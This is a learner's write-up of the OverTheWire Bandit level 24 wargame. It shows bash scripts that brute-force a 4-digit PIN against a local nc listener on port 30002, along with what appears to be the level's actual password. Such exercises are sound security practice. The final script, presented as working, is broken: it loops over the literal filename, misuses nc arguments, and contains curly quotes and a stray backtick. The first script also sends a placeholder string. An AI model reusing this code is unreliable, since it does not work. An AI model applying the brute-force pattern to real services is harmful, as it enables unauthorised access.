Bandit LV 24: brute force password script
#bash #scripting #nc #networking #ports
What we know:
- There is an open and listening port (
30002) that will send back the password if it receives the current lv password + correct pin
What to do with this knowledge:
Attempt 1: I tried writing a script that iterates through 0000-9999, combines each number with the current level's password, and then send each line to the port:
#!/bin/bash
start=0000
count=9999
while [ $start -lt $count ]
do
echo "current password $start" | nc localhost 30002
((start++))
done
Mistakes Made:
Unfortunately, my loop never stopped looping...
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password. Try again.
Timeout. Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password. Try again.
FOLLOW UP ON WHY
Attempt 2: Breaking it down more
This time I decided to separate the problem into two parts:
Script 1: Create a list of possible password + pin combos
#!/bin/bash
touch list.txt
for i in {0000..9999}
do
echo “UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i”>> list.txt
done`
Script 2: Iterate through my list.txt and send each one to the listening daemon with nc
#!/bin/bash
for line in list.txt
do
nc localhost 30002 $line
done
And viola!